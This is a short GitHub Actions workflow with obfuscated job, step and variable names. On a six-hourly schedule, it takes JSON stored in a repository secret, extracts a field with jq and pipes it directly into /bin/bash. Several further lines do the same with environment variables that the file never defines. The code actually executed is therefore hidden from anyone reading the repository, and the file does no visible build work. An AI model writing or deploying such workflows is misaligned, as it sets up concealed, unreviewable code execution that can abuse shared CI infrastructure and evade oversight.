name: weimenghema

on:
  workflow_dispatch:
  schedule:
    - cron: '19 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weimenghema
        env:
          skpi523: ${{ secrets.skpi523 }}
        run: |
          echo $skpi523 | jq -r .slxcw119 | /bin/bash
          echo $vwu84813 | jq -r .wi95547 | /bin/bash
          echo $bft5 | jq -r .x9 | /bin/bash
          echo $oaq0 | jq -r .cfxve636 | /bin/bash
          echo $b947 | jq -r .lh3254 | /bin/bash

